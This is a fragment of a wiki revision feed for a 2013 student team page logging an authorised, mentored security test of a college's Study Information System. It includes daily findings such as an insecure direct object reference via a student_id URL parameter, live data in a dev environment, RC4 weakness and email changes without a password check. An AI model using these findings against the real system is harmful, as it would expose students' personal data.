===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62400</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62400"/>
		<updated>2013-04-05T08:24:45Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Feedback from Sten Aus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive (link will be here soon).&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.&lt;br /&gt;
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don&#039;t know the purpose yet, but you will find it out in the future.&lt;br /&gt;
&lt;br /&gt;
I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62384</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62384"/>
		<updated>2013-04-05T07:05:30Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Materials (slides etc) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
